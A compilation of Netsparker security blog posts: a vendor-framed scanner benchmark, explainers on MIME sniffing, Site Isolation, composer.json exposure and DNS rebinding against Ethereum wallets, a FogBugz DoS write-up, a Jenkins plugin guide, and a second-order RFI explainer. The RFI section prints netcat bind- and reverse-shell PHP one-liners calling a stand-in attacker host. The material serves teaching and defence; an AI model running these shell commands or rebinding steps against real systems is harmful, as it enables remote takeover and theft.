          2. Can Netsparker Identify Security Flaws in Your Web Applications and APIs?
        • Past Comparisons Between Automated Web Application Security Scanners

        What is the Web Application Security Scanner (DAST) Benchmark?

        It is a test that compares the features, coverage, vulnerability detection rate and accuracy of automated web application security scanners, also known as web vulnerability scanners or Dynamic Application Security Testing (DAST) solutions.

        Individual tests were conducted by the independent information Security Researcher and Analyst, Shay Chen. Shay has been conducting benchmark tests and improving the platform since 2010. So far he has released six (2010, 2011, 2012, 2013/2014, 2015, 2017/2018). His work is considered the de facto comparisons results by the application security industry.

        How Are Tests Performed?

        Shay Chen and his team built The Web Application Vulnerability Scanner Evaluation Project (WAVSEP), a testbed that they scan to see how every scanner performs. The WAVSEP is an open source project and new tests are incorporated every year. You  can download it from the WAVSEP GitHub repository.

        This year Shay and his team went a step further. They have been installing and integrating DAST solutions in real-life enterprise SSDLC (Secure Software Development Lifecycle) processes to get a better understanding of how they can expand the WAVSEP testbed and test the scanners. The have implemented automated vulnerability scanners in financial, hi-tech and telecom organizations. As Shay himself explains:

        Some of these experiences led us to develop test cases aimed to inspect issues in proclaimed features that we noticed didn't work as expected in actual implementations, and some to the creation of comparison categories that are apparently crucial for real-world implementations.

        The Negative Impact of False Positives

        Shay and his team also talked about the importance of accurate scan results in the report, after their first-hand experience with scanners in real-life environments. Quoting from the official benchmark results:

        Weeding out a reasonable amount of false positives during a pentest is not ideal, but could be performed with relative ease. However, thousands upon thousands of false positives in enterprise SSDLC periodic scan scenarios can take their toll.

        False positives occur in scan results to the detriment of the web application security industry. So much so, that large organizations, that have hundreds or even thousands of web applications, limit their efforts to a handful of mission-critical websites and ignore the rest. I was quite shocked to learn this, though it is unsurprising because many hacks and data leaks that happen every year.

        False Positives Make Scaling Up Web Security Impossible

        If a solution reports false positives, it is impossible – unless you have an army of people – to scale up your efforts and secure all your web applications. Even if you have the budget for such an undertaking, there is still the troublesome problem of human error.

        This is why we developed Netsparker's proprietary Proof-Based Scanning, technology that automatically verifies detected vulnerabilities – proving they are real flaws, and not false positives. The benefits of such technology are plentiful, and since the scan results are accurate, you can easily scale up your efforts. In a real-life environment, with thousands of web applications, you can start the vulnerability triage process and fix them within a matter of hours.

        Evaluation Criteria

        In the 2017/2018 benchmark tests, Shay and his team included several previously uncovered aspects of scanners and new tests to check the detection capabilities of previously uncovered vulnerabilities. This included OS Command Injection, and repurposing XSS via RFI tests that can also be used for Server Side Request Forgery (SSRF) evaluation.

        The Benchmark Results – Global Results

        How Many Vulnerabilities Did the Scanners Detect?

        This matrix lists what percentage of all vulnerabilities each web application security scanner identified. Missing data or scores are represented with 'N/A'.

        NetsparkerWebInspectAppSpiderAcunetixBurp SuiteAppScan
        OS Command Injection (New)100N/A99.1178.5793.3N/A
        Remote File Inclusion/SSRF (New)10010082.6764.2274.67N/A
        Path Traversal10091.1881.6194.1278.31100
        SQL Injection10098.4695.3910097100
        Reflective XSS10010010010097100
        Unvalidated Redirect10095.5110010076.6736.67
        Average %100.097.093.189.586.284.2

        Clearly, Netsparker beats the competition in terms of vulnerability detection. It was the only scanner to identify all the security issues, followed by HP WebInspect at 97% and Rapid7 AppSpider at 93.1%.

        Note: Missing data or scores were the result of lack of support (in some cases even a lack of response) from some vendors. Only the tests for which scanners had a result were used to calculate the global average.

        How Many False Positives Were Reported?

        This matrix lists what percentages of all false positives each web application security scanner identified.

        NetsparkerAppSpiderWebInspectAppScanAcunetixBurp Suite
        OS Command Injection (NEW)000000
        Remote File Inclusion / SSRF (NEW)0000016.67
        Path Traversal0000012.5
        SQL Injection000000
        Reflective XSS000000
        Unvalidated Redirect001111110
        Total %0.00.01.81.81.84.9

        Netsparker and Rapid7 AppSpider were the only solutions that reported zero false positives, while Burp Suite was the one that reported the most false positives.

        Graph with Global Detection & False Positives Rates

        This graph is a visual representation of the global results, illustrating both the vulnerability detection and false positives rates side by side for each vendor.

        The Benchmark Results – Individual Tests Results

        OS Command Injection Detection

        The OS Command Injection vulnerability tests is one of the new tests. Netsparker was the only scanner to detect all the vulnerability instances in the test.

        Remote File Inclusion / SSRF

        This was also one of the new tests included in the WAVSEP benchmarking tests. Netsparker and WebInspect were the only two scanners that detected all the vulnerabilities in this test. AppSpider followed with 82.67%, and then Burp Suite with 74.67%. Though Burp Suite also had 16.67% false positives.

        Path Traversal

        This time Netsparker and Appscan led the field, both of which detecting all the Path Traversal vulnerabilities.Acunetix WVS and HP WebInspect came third and fourth, followed by AppSpider. Burp Suite was the scanner that detected the least at 78.31% and also reported 12.5% false positives.

        SQL Injection

        This is one of the classic tests; the SQL injection vulnerability. In this test Netsparker, Acunetix WVS and Appscan detected all the vulnerabilities. HP WebInspect followed with 98.46%. None of the scanners reported any false positives in this test.

        Reflective Cross-site Scripting (XSS)

        All scanners but Burp Suite detected all the cross-site scripting vulnerabilities.

        Unvalidated Redirect

        In the unvalidated redirect vulnerability tests three of the scanners, WebInspect, Acunetix and AppScan reported vulnerabilities. AppScan also performed very poorly with a detection rate of only 36.67%. On the other hand, Netsparker, AppSpider and Acunetix detected all the vulnerabilities.

        Are Web Security Scanner Comparisons Useful & Realistic?

        As a rule of thumb, nothing beats a live environment test. In fact, at Netsparker we always encourage potential customers to test our web security solution by scanning a staging copy of their web applications, as explained in How to Evaluate Web Application Security Scanners.

        It's impossible to test all the scanners available on the market. So, these comparisons are incredibly useful because they highlight who the market leaders are – those scanners that can detect the most vulnerabilities and generate accurate results.

        Which is the Best Web Application Security Scanner?

        The best web vulnerability scanner is the one that detects the most vulnerabilities in your web applications, is easiest to use and can help you automate most of your work. Finding vulnerabilities in a web application is not just about the duration of the scan, but how long it takes to setup the scan (pre-scan) and verify the results (post scan). Therefore, when you evaluated solutions, you should ensure that automated vulnerability confirmation is part of the equation.

        Read Shay Chen’s full report: Evaluation of Web Application Vulnerability Scanners in Modern Pentest/SSDLC Usage Scenarios.

        Can Netsparker Identify Security Flaws in Your Web Applications and APIs?

        The best way to find out is to download a demo and launch a vulnerability scan. Netsparker is very easy to use and most of the pre-scan configuration is automated. All you need to do is specify the URL and credentials (to scan password protected websites), and launch the scan.

        Past Comparisons Between Automated Web Application Security Scanners

        See the previous results for the comparisons between the 2015 web application security scanners and 2013-2014 web application security scanners.

        Netsparker's Weekly Security Roundup 2018 – Week 04

        $
        0
        0

        Every security researcher should develop their skills in reading and understanding RFCs. While they may not provide an exciting read, they still can help you decipher how certain protocols work and what obstacles developers might face while attempting to implement them.

        Here is one example of an RFC text.

        One example of an RFC text.

        This text was the taken from RFC 7231 and explains those cases in which the server should send a Content-Type header. For those not familiar with the vocabulary in these documents, they contain various key words for developers, to help them correctly implement the protocol's features. The keyword 'SHOULD' from the sample RFC has a very specific meaning. It is defined in RFC 2119 Key words for use in RFCs to Indicate Requirement Levels as follows:

        This word, or the adjective 'RECOMMENDED', means that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

        This means that developers don't necessarily have to implement functionality with the 'SHOULD' key word, if they have good reason.

        But what happens if the server doesn't send a proper Content-Type header? How do web browsers deal with this scenario?

        What is Mime Type Sniffing?

        In many cases, browsers don't need to consult the Content-Type header in order to understand what kind of content they are currently processing. If the content begins with an <html> tag, it will most likely be interpreted using the mime type (text/html) and be treated as an HTML file. Similarly, if a certain file doesn't have a proper mime type but is included via a script src attribute, browsers assume that its content-type was meant to be application/javascript.

        This is also known as Mime Type Sniffing. However, this behaviour is not free from security implications. Think of an upload functionality, for example. Let's suppose that a user is allowed to upload text files. This doesn't seem dangerous at first. But if the server doesn't return a proper Content-Type, it's possible for a user to upload a file that contains HTML tags and JavaScript code. If you were to visit the page with a browser that attempts to find out which Content-Type was intended, it will probably recognize the HTML tags in the file and render the content as if the text/html Content-Type header was set.

        Missing Content-Type Header Vulnerability

        However, it's possible to prevent a browser from correcting the mime type. The way to do this is to set a header called X-Content-Type-Options with its only allowed value nosniff. You may have seen this header already, but probably didn't think it was of great importance. The truth is that X-Content-Type-Options is an important header in terms of security, especially since it allows Site-Isolation to be used.

        What is Site-Isolation?

        Site Isolation is a new feature that was introduced with Google Chrome 63. Simply put, different origins now run in different processes, regardless whether they are loaded in a different tab, the same tab, or even in an iframe.

        The Universal XSS (uXSS) is an XSS type that results from a vulnerability in the browser itself and allows you to access the DOM from different origins. But is this isolation even necessary, if we already have the Same Origin Policy (SOP)? Well, SOP continues to be the most important building block in terms of client-side security features in relation to managing resources of different origins. But what happens if there is a Universal XSS (uXSS) vulnerability that allows an attacker to bypass the Same Origin Policy?

        This is where Site Isolation comes into play. The content of HTML, JSON and XML files are maintained as separate processes and won't be shared with other processes unless otherwise specified by CORS headers. So even if you were able to include a JSON file from a different origin, Chrome decides whether or not to use a different process for any given file by looking at the Content-Type header. The following Content-Types may be opened in a new process:

        • text/html
        • text/xml
        • application/xml
        • application/rss+xml
        • application/json
        • text/json
        • text/x-json
        • text/plain

        In addition to the correct Content-Type, you need to make sure to include the X-Content-Type-Options: nosniff.

        What You Need to Know About Site Isolation

        Site Isolation is available, but turned off by default in Chrome 63 and above. If you want to enable it, you need to enter chrome://flags/#enable-site-per-process into your browser and enable Site Isolation. The changes will take effect as soon as you restart the browser.

        Additionally, it's possible to enable Site Isolation for specific sites. This is a little bit more complicated than the option we mentioned above, since you need to pass an additional parameter to Chrome when you start it. You can do this by passing flags to the chrome executable. The flag --isolate-origins=https://google.com,https://youtube.com will therefore enable this feature for google.com and youtube.com only.

        Another caveat is that HTTP Range Requests don't work as separate process, due to their Content-Type (multipart/byteranges). For sensitive files, you should disable HTTP Range Requests, if you want your users to benefit from Site Isolation.

        But this isn't the only current disadvantage. When Site Isolation is enabled for every website, you might notice an increased resource consumption of an additional 10-20%. That's why it's recommended to only protect certain sites with this feature. Additionally, this technology is not free from bugs. If you print a website, the iframes that are displayed on the page will be empty and in some cases clicks and page scrolling won't work as expected within iframes.

        Yet again, it seems like better security measures come at the cost of worse user experience. It's hard to say if Chrome will get rid of the bugs in iframes, and whether the performance hits can be mitigated. However, if you want to be extra careful and can live with the occasional bug, or if you have a powerful high-end PC that can deal with 10-20% higher resource consumption, Site Isolation is a great feature that's worth testing.

        How We Found & Exploited a Layer 7 DoS Attack on FogBugz

        $
        0
        0

        Modern day Denial of Service (DoS) attacks cause much consternation in the web security industry because they are so inexpensive, easy... and devastating! While the cost of conducting such attacks decreases by the day, the damage caused to target systems escalates with each attack.

        Attacks that capture the attention of the mass media use an army of infected devices to generate a massive amount of network traffic in order to take down target systems. They are typically low complexity network attacks. The objective is to render the system unusable for legitimate users. However, not all application layer Denial of Service (DoS) attacks are the same. Though many often aim to generate a very large amount of network traffic, sometimes it is enough to make only a few requests to achieve the desired effect.

        In this article, I explain how specific application behavior I encountered in FogBugz (a web-based project management tool) might easily be used to overload a system. Netsparker web application security scanner reported finding this issue in the latest version of Fogbugz, early in July 2017.

        What to Check to Determine Whether a DoS Vulnerability Existed

        The first indicator to check is HTTP status codes. This does not mean, though, that there is a problem every time we do not see '200 OK' (the standard response for successful HTTP requests). It will become clear how this is useful to us in the example in the next section.

        The second indicator is response size. If the database queries are not sufficiently controlled, when an unexpected situation occurs, the response size can get out of control.

        Timing is the third important indicator. If the response to a request, that you've already checked, takes an unusually long time, then this is probably the right place to test for DoS.

        How We Determined Fogbugz was Vulnerable to DoS

        As with most project management tools, Fogbugz (now known by its new name, Manuscript) has functionality that allows users to create timesheets for tracking their working time. Users can examine activities on specific dates by filtering, as shown.

        Users can examine activities on specific dates by filtering, as shown.

        Once the filters are selected, the application makes a POST request and fetches the relevant records from the database. Every single user input is carefully sanitized to protect against attacks such as SQL Injection and XSS. Initially, everything might seem to be normal, but there is a small detail that can easily be overlooked.

        Let's take a closer look at the Summary Level parameter and what it actually does. The default value of this parameter is '1'. When we send the request with this value, column headers (Date, Person, Case and Total) are displayed.

        Let's take a closer look at the Summary Level parameter and what it actually does.

        By entering higher numbers, we can produce more detailed tables. For example, when I entered '3', the application added two further columns.

        By entering higher numbers, we can produce more detailed tables.

        You may not yet have noticed the problem, but it will become clearer when we enter a higher number and look closer at how the column names change.

        When we enter a higher number and look closer at how the column names change.

        There are no limit checks, such as 1< x <10, for the entered value. Therefore, an infinite loop occurs when we use large numbers for the parameter. To test this I entered 20,000, and all the browsers I tested this on crashed because the response size was too large.

        The advanced tools that web browsers offer for developers may cater for many things, but they may not be enough at this point.

        Checking Response Size and HTTP Status Codes With Curl

        When I encounter browser crashes caused by similar problems, my preferred, preventative solution is Curl. Curl is a Linux utility that allows you to easily issue HTTP requests from the command line. You can simply send the request and view the response details.

        In the screenshot, you can see the value of the Summary Level parameter I sent on the right hand side. The highlighted section (fifth row from the bottom) shows a value of 20,000. In this case, the response size grew to 274 megabytes.

        In the screenshot, you can see the value of the Summary Level parameter I sent on the right hand side. The highlighted section (fifth row from the bottom) shows a value of 20,000. In this case, the response size grew to 274 megabytes.

        So, we are able to increase the response size up to 274MB from 94K, per request. When we use values above 20,000, this will very quickly result in a 504 Gateway Timeout.

        When we use values above 20,000, this will very quickly result in a 504 Gateway Timeout.

        Conducting Timing Tests With Curl

        Curl also provides other timing details, such as time_namelookup, time_connect, and time_starttransfer. Another tip is that it allows users to use formatted output templates.

        Here are the timing details provided when I used a default value (1) for the Summary Level parameter.

        Here are the timing details provided when I used a default value (1) for the Summary Level parameter.

        This was the response time for the request when the Summary Level parameter was set to 1000.

        This was the response time for the request when the Summary Level parameter was set to 1000.

        This was the response time for the request when the Summary Level parameter was set to 100,000.

        This was the response time for the request when the Summary Level parameter was set to 1000. This was the response time for the request when the Summary Level parameter was set to 100,000.

        The tests revealed that I was able to increase the response time up to 600 times per request. It is possible to do same thing for the response length.

        Overlooking Input Checks Can Lead to DoS on the Application Layer

        As we have demonstrated in the Fogbugz example, if attackers can make the server generate a huge amount of data using a relatively small request, this can lead to a DoS. Using a simple script with multiple threads support, the attacker can amplify this effect and eventually make the server unresponsive for all legitimate users. Also, in this case, the maximum size of the response that the server could handle was 274 MB. It is possible to create a  huge response by sending a small request. If the necessary checks, like limiting parameter 1<x<10, were properly made following the user inputs, we would not have been able to produce such a huge response size without large parameter values.

        In this case, checking for these items would have prevented the vulnerability that lead to the DoS.


        Netsparker's Weekly Security Roundup 2018 – Week 05

        $
        0
        0

        Table of Content

        1. Why You Should Be Careful What You Put Into Your composer.json File
        2. Why You Need to Use a Package Manager
            1. Composer Package Manager Can Expose Sensitive Information
            2. The Principle of Least Privilege Limits Exploitation Opportunities
        3. It's all about SOP – How Anyone Can Steal Your Ethereum Cryptocurrency With DNS Rebinding
            1. What are DNS, TTL and SOP?
            2. The Problem With JSON-RPC and Local Web Servers

        Why You Should Be Careful What You Put Into Your composer.json File

        What do Joomla!, Typo3, MediaWiki and Matomo (formerly known as Piwik) have in common? Aside from the fact that all of them are popular open source PHP projects with a large number of users, there is one similarity that you will only notice if you try to install the projects yourself, or if you look at their github accounts.

        Joomla! contains a composer.json file.
        Joomla!

        Typo3 contains a composer.json file.
        Typo3

        MediaWiki contains a composer.json file.
        MediaWiki

        Matomo contains a composer.json file.
        Matomo

        As you might have noticed, each project repository contains a composer.json file. What does it do? If these popular applications include it in their projects, there is probably a very good reason to use it. So what exactly is composer.json?

        Why You Need to Use a Package Manager

        You might be familiar with package management tools from the Linux operating system (pacman, APT, YUM), Mac OS (Homebrew), Windows (Microsoft Store), Android (Google Play) or iOS (App Store). If you're a developer, the chances are that you've also heard of the Node Package Manager (npm) or pip for Python.

        If you have used any of these tools in the past (and remember the alternative – compiling and installing the programs and all of their dependencies manually), you'll realize why almost all modern programming languages and operating systems have either a native package management tool or one that was developed by their respective communities. PHP is no exception.

        Composer Package Manager Can Expose Sensitive Information

        The composer.json file is part of the Composer Package Manager (CPM) for the PHP programming language. The CPM enables you to update, install and manage the libraries on which your application depends. All you need is the composer.json file and the CPM in order to parse it.

        Since JSON files are designed to be easy to read by both machines and humans, you can open the file with a text editor (or with a browser, if it was accidentally left in the webroot). Then, you can see which components the application depends on, and whether each is the up to date version.

        You can already see where this is going. The composer.json file might reveal sensitive information to an attacker, such as the exact names and versions of your dependencies. While it's almost inevitable that your application will be exploited if you use vulnerable, out-of-date software, the information in this file can also help hackers craft a targeted attack, especially if you use dependencies that aren't widely known or audited.

        This is not the only issue that may arise from using Composer. The hard truth is that many developers use Composer incorrectly. Let's look at one of the most common mistakes. This example is replicated from section 1 of PHP Composer security:

        # composer.json: insecure
        {
          "name": "my/awesome_project",
          "require": {
            "php": "~7.1.7",
            "ext-mysqli": "*",
            "symfony/validator": "^4.0",
            "guzzlehttp/guzzle": "^6.3",
            "phpunit/phpunit": "^6.5",
            "squizlabs/PHP_CodeSniffer": "^3.2"
          },
          "autoload": {
            "psr-4": {
              "AwesomeProject\\": "app/",
              "AwesomeProject\\Tests\\": "tests/"
            }
          }
        }

        Did you notice the subtle mistake? Both phpunit and validator are not designed to be used in a production environment. In addition, the autoload functionality includes the tests folder. While this is a convenient feature to have during the development process, it can lead to various vulnerabilities in production.

        The Principle of Least Privilege Limits Exploitation Opportunities

        The real problem here is that you broaden your attack surface if you include additional libraries that are only needed in development. It's a good idea to adhere to the Principle of Least Privilege (POLP). It means that users should have the bare minimum of privileges they need in order to conduct relevant tasks.

        Let's say that you want to implement comment functionality for a blog. If you use an SQL database in order to save the comments, you only need to allow INSERT statements. Since users don't have the option to delete their comments, it doesn't make sense to allow DELETE statements as well. So, if there is an SQL injection vulnerability in the comment functionality, an attacker's exploitation options are severely restricted. Also, if the SQL user's access is restricted to the comment table only, the attacker can't add a new Admin user for example.

        The Composer developers are aware of this problem and provide an easy solution. They allow you to specify which packages you only want to use during development. This is relatively easy to implement. The secure version of the above composer.json file would look like this example which is replicated from section 2 of PHP Composer security:

        # composer.json: autoload-dev section
        {
          "name": "my/awesome_project",
          "require": {
            "php": "~7.1.7",
            "ext-mysqli": "*",
            "symfony/validator": "^4.0",
            "guzzlehttp/guzzle": "^6.3"
          },
          "require-dev": {
            "phpunit/phpunit": "^6.5",
            "squizlabs/PHP_CodeSniffer": "^3.2"
          },
          "autoload": {
            "psr-4": {
              "AwesomeProject\\": "app/",
            }
          },
          "autoload-dev": {
            "psr-4": {
              "AwesomeProject\\Tests\\": "tests/"
            }
          }
        }

        By loading this file with composer install --no-dev, we can make sure that we only load the libraries needed in production instead of the development ones.

        To find out more about composer security best practices, see PHP Composer security.

        It's all about SOP – How Anyone Can Steal Your Ethereum Cryptocurrency With DNS Rebinding

        The value of Cryptocurrencies is fairly unpredictable, given that it's still a young phenomenon and it's so easy to invest in, even for unexperienced traders. It's common for the price of Bitcoin – probably the most widely known cryptocurrency – to increase by $500 within the course of a single hour. The problem is that you can lose an equal amount of money in about the same time.

        Nevertheless, it looks like cryptocurrencies are gaining popularity among traders, merchants and, of course, criminals. Since many of these coins are untraceable and their value increases rapidly, they are a prime target for hackers.

        Tavis Ormandy, a researcher from Google's Project Zero, painfully reminded the developers of the Transmission Torrent client that it's not a good idea to run insecure web applications on your local network. He abused an insufficiently protected JSON-RPC interface on a server running on localhost. We'll examine what JSON-RPC is later in the article. Even when these HTTP servers aren't directly accessible from outside of your home network, it's possible that websites access them through your browser.

        What are DNS, TTL and SOP?

        To read more on why it is a dangerous idea to run insecure web applications on localhost or on your private home network, including DNS Rebinding, see Vulnerable Web Applications on Developers' Computers Allow Hackers to Bypass Corporate Firewalls.

        In this article, however, let's briefly examine what DNS rebinding is and how it can be used by attackers.

        First, you have to understand Same Origin Policy (SOP). SOP makes sure that http://attacker.com can't read the responses from requests it makes to http://banking.com. SOP is one of the fundamental building blocks of the modern web. Without it, opening a website could expose your private messages on social media websites, your bank account balance or the content of your emails to risk.

        Along with factors such as the protocol you used to visit a page, as well as the port running the web application, SOP is closely tied to the host name of the website. The host name is what you type into a browser when you want to visit the site. In the above example, the attacker's host name is http://attacker.com. Since it doesn't match http://banking.com, the SOP prevents it from reading the responses of requests it issues to the banking website.

        In order to return its IP, a website needs to have its own name server. DNS rebinding is a very technical matter. Let's just say that for the sake of illustration, the DNS protocol is less like a phone book (even though it's often described as one) and more like a database on a server. You can change the IP your hostname points to however you like, and as often as you want (for example if you move your website to a different server).

        Since this doesn't happen very often on most websites, the response of the web server contains the Time To Live (TTL). This is a numeric value (in seconds) that specifies how long a client should consider the IP address as safe to use. If there is a value of 300, this means that the IP will probably not change for the next five minutes. Therefore clients, such as browsers, won't ask the web server for its IP for at least five additional minutes, guaranteeing faster loading times as well as less requests for the DNS server to answer.

        Five minutes is short. But, imagine that there was a value of zero seconds. For almost every real world client, this would mean that with every new HTTP request you would have to send a new DNS request too. Also, apparently setting a TTL of zero has different meanings depending on the client. Generally, it would be an instruction not to cache this DNS record and ask for the IP with every new request. This may be acceptable behaviour for some applications, but browsers are optimized to deliver the fastest possible loading time. This is a selling point of most modern browsers.

        One extreme example of how important the loading times are for browser manufacturers is evidenced by Microsoft Edge's Windows 10 popups ('Edge is faster than Chrome, switch now!'). Unfortunately, many users found these taskbar popups annoying and spammy. In any case, what browsers usually do is ignore the TTL value if it is less than 60 seconds, which is more than enough time to load all a website's resources without additional causing overhead with too many DNS requests.

        How Attackers Can Game the System to Exploit a Local Application

        Now that you know the basics about TTL, SOP and DNS, let's take a look at how an attacker can game the system in order to exploit a local application, and which problems he faces. Assume that he can somehow force you to visit his website. In our example, we use attacker.com, though a real attacker would choose a slightly less obvious name! When you visit attacker.com, your browser issues a DNS request to its nameserver, which returns the server's IP, 192.0.2.2. There is usually a good reason why you were prompted to click the link, for example an article about a topic you are interested in. However, the page actually contains JavaScript code that constantly queries http://attacker.com/index.html, and sends the result back to 192.0.2.2/log.

        That's a little bit weird, isn't it? After all, the attacker already knows the content of his own index.html file, so what does this achieve? Well, imagine that the attacker advised his DNS server to return 192.0.2.2 in the first request, but 127.0.0.1 (the IP address corresponding to your local machine) in all subsequent DNS requests. The attacker sets the TTL to a very small value (less than 60 seconds) and then waits. After 60 seconds, the browser's DNS cache expires and the script that queries http://attacker.com/index.html doesn't fetch the index.html file on 192.0.2.2 again, but rather the file on 127.0.0.1, your local machine.

        The reason why he doesn't directly issue a request to 127.0.0.1/index.html is that he couldn't read the response due to SOP. However, since there is a script running under the origin of attacker.com and 127.0.0.1 is now also reachable under the origin of http://attacker.com, the same origin policy doesn't have any effect, and the attacker can receive and read the response from your local machine.

        The Problem With JSON-RPC and Local Web Servers

        Well, I'm not a developer, why would I run a web server on my local machine?

        If you think about it, this is an absolutely valid question. If you don't install a server like Apache on your local machine, you shouldn't be concerned about DNS rebinding at all, should you? Unfortunately it's not that easy. A lot of developers include local HTTP servers in their applications, to let a certain website communicate with your local machine. An example for this would be an 'Open Song' button on a website that allows you to download music to your computer. The website could then communicate with the music player application through a web server running on localhost, which would then play the song. It's also common to let local applications communicate with each other through such an HTTP interface.

        But of course there are more vulnerable applications that may use an HTTP interface. A researcher, who goes by the Twitter name Jazzy, took a look at the local HTTP server of certain Ethereum wallets. He found out that many of them run a JSON-RPC interface on port 8545. JSON-RPC is a protocol that allows clients to communicate with a server in order to send notifications or instruct them to execute certain actions. As the name suggests, it uses JSON encoded messages for communication.

        The problem for an attacker targeting Ethereum wallets is that even though he could issue requests to the JSON-RPC interface, he couldn't read the responses. This is where DNS rebinding comes into play. Jazzy wrote a simple DNS server that he used for DNS rebinding in Python. He then wrote some JavaScript code in order to exploit the vulnerable Ethereum clients. This is now he described the process:

        • The victim opens attacker.com
        • The DNS server responds with Jazzy's server IP
        • attacker.com creates a hidden iframe, pointing to a random subdomain (corresponding to Jazzy's server IP) and the port 8545
        • The JavaScript code waits for 60 seconds, and then issues an XHR request to randomsubdomain.attacker.com/test
        • Since the DNS cache expires after a minute, the browser sends another DNS request; this time randomsubdomain.attacker.com points to 127.0.0.1
        • Since the JavaScript code is still running under the origin of attacker.com, which is now pointing to 127.0.0.1, Jazzy can easily read the responses

        The reason why he uses a random subdomain for each attack is simple. DNS queries are often routed through different servers. This means that the IP the DNS server sees isn't necessarily the IP of the user. It's possible that multiple users visit the site, but their DNS requests come from the same IP. Therefore using the IP address isn't a reliable way to tell two users apart. A subsequent victim that visits attacker.com would instantly see an empty JSON-RPC response instead of the page containing the malicious JavaScript code, which is why using different subdomains for each user is the safest way to get it right.

        In his blog post How your ethereum can be stolen through DNS rebinding, Jazzy explains that he was able to read Ethereum addresses and balances, and could possibly steal Ethereum if the wallet wasn't locked. Even though this sounds like a serious vulnerability that needs fixed, the Ethereum Foundation doesn't acknowledge it. It's hard to say how long it will take until someone actively exploits this vulnerability in the wild, but considering the fact that many attackers seem to be eager to make a quick buck by robbing Bitcoin exchanges and stealing cryptocurrency tokens, our guess is that attackers will act soon, especially since Geth and the C++ and Python clients seem to be vulnerable.

        How to Install and Configure the Netsparker Cloud Scan Jenkins Plugin

        $
        0
        0

        Jenkins is an automation server that enables software developers to build automation into their projects by supplying plugins. Jenkins functionality can be extended by using our new Netsparker Cloud Scan Jenkins plugin.

        Jenkins Logo

        This article explains how to install and configure the new Netsparker Cloud Scan Jenkins Plugin to enable our advanced integration functionality so that you can launch automated scans and view reports of vulnerabilities in Jenkins.

        Downloading and Installing the Netsparker Cloud Scan Jenkins Plugin

        The plugin is packaged into an hpi file called netsparker-cloud-scan.hpi. This package has been tested and approved for Jenkins version 2.33+.

        To Download and Install the Netsparker Cloud Scan Jenkins Plugin
        1. In Netsparker Cloud, navigate to the New Integrations window, and from the Continuous Integration Systems panel, select Jenkins.

        In Netsparker Cloud, navigate to the New Integrations window, and from the Continuous Integration Systems panel, select Jenkins.

        The Jenkins Plugin Installation and Usage window is displayed.

        The Jenkins Plugin Installation and Usage window is displayed.

        1. Click Download the plugin, and save the file to a location of your choice.
        2. Open Jenkins.

        Open Jenkins.

        1. From the main menu, click Manage Jenkins. The Manage Jenkins window is displayed.

        From the main menu, click Manage Jenkins. The Manage Jenkins window is displayed.

        1. Click Manage Plugins. The Plugin Manager window is displayed.

        Click Manage Plugins. The Plugin Manager window is displayed.

        1. Click the Advanced tab.

        Click the Advanced tab.

        1. From the Upload Plugin section, click Choose File. The Open dialog box is displayed.

        From the Upload Plugin section, click Choose File. The Open dialog box is displayed.

        1. Select the netsparker-cloud-scan.hpi file you downloaded previously, and click Open. The file is uploaded, and the focus of the window returns to the Advanced tab.

        The file is uploaded, and the focus of the window returns to the Advanced tab.

        1. In order to use the plugin, restart Jenkins. To restart, from a browser, navigate to:
        • [jenkins_url]/safeRestart (restarts Jenkins after the current builds have completed)
        • [jenkins_url]/restart (forces a restart and builds will not wait to complete)

        Configuring The Jenkins Project

        Each Jenkins project has its own build configuration. Each build configuration has its own build steps. The Netsparker Cloud Scan must be added to a Jenkins project as a build step.

        How to Configure the Jenkins Project
        1. Open Jenkins. From the main menu, click Manage Jenkins.

        Open Jenkins. From the main menu, click Manage Jenkins.

        The Manage Jenkins window is displayed.

        The Manage Jenkins window is displayed.

        1. Click Configure System. The Configure System window is displayed.

        Click Configure System. The Configure System window is displayed.

        1. In the Netsparker Cloud section, enter your Netsparker Cloud Server URL and API Token, and click Test Connection.
        1. Navigate to the Jenkins Home page and click the project you want to add to the Netsparker Cloud Scan's build step.

        Navigate to the Jenkins Home page and click the project you want to add to the Netsparker Cloud Scan's build step.

        1. The Project window is displayed.

        The Project window is displayed.

        1. From the menu, click Configure. The Configure window is displayed.
        2. Click the Build Environment tab.

        Click the Build Environment tab.

        1. From the Build section, click the Add build step dropdown, and select Netsparker Cloud Scan. The Scan Settings panel is displayed.

        From the Build section, click the Add build step dropdown, and select Netsparker Cloud Scan. The Scan Settings panel is displayed.

        1. Select the relevant options from Scan Type, Website Deploy URL and Profile Name.
        2. Click Save.

        Viewing Netsparker Scan Results in Jenkins

        When the build has been triggered, you can view the scan results in the Netsparker Cloud Report window.

        How to View Netsparker Cloud Reports in Jenkins
        1. Open Jenkins.

        Open Jenkins.

        1. From your project page, select a build from the Build History section. The Build Detail window is displayed.

        From your project page, select a build from the Build History section. The Build Detail window is displayed.

        1. From the menu, click Netsparker Cloud Report. The scan may take a while. If it is not yet finished, a warning message is displayed.

        From the menu, click Netsparker Cloud Report. The scan may take a while. If it is not yet finished, a warning message is displayed.

        1. When the scan has been completed, the scan results, Netsparker Cloud Executive Summary Report, are displayed.

        When the scan has been completed, the scan results, Netsparker Cloud Executive Summary Report, are displayed.

        1. For further integration with Netsparker Cloud, you can also ensure that your SCM plugin is configured to share changelog data. From your Project window, click the Source Code Management tab. From the Additional Behaviours dropdown, select the Committer's name.

        From the Additional Behaviours dropdown, select the Committer's name.

        Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example

        $
        0
        0

        The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI, attackers do not receive an instant response from the web server, so it is more difficult to detect. This is because the payload that the attacker uses to exploit the vulnerability is stored and executed at a later stage.

        Exploiting a Second-Order Remote File Inclusion Vulnerability

        Imagine a website that allows users to submit links through a web form. These submissions are later reviewed by a moderator, on a control panel that directly adds the remote content into the page. If an attacker manages to use the form to submit a remote website containing a dangerous payload, this payload will be executed once the moderator opens the page.

        This means that the attacker's included will still be executed on the web server. However the attacker can not use a guided web shell with a user interface to issue commands, as the admin is the only one who would see the output. So they have to resort to alternative techniques, such as spawning a bind or reverse shell.

        A bind shell listens on a specific web server port and binds a shell (such as Bash) to it. Once the attacker connects, they are able to execute commands. This will not work, however, if a firewall is in place that prevents non-whitelisted ports from receiving incoming connections.

        <?php
        system(‘nc -lp 4444 -e /bin/bash’);

        A reverse shell does the same, but instead of listening on the web server, it actively initiates a connection to the attacker’s machine. This bypasses the firewall rule, since this connection is outgoing, not incoming.

        <?php
        system(‘nc attacker-server.com 4444 -e /bin/bash’);

